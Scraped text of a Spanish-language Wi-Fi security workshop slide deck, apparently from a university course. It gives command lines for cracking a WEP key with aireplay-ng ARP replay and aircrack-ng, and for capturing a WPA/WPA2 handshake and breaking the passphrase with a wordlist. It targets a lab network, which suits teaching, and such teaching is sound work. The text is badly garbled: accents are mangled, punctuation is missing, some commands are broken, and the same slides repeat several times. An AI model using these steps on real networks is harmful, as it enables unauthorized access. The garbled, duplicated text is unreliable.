Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
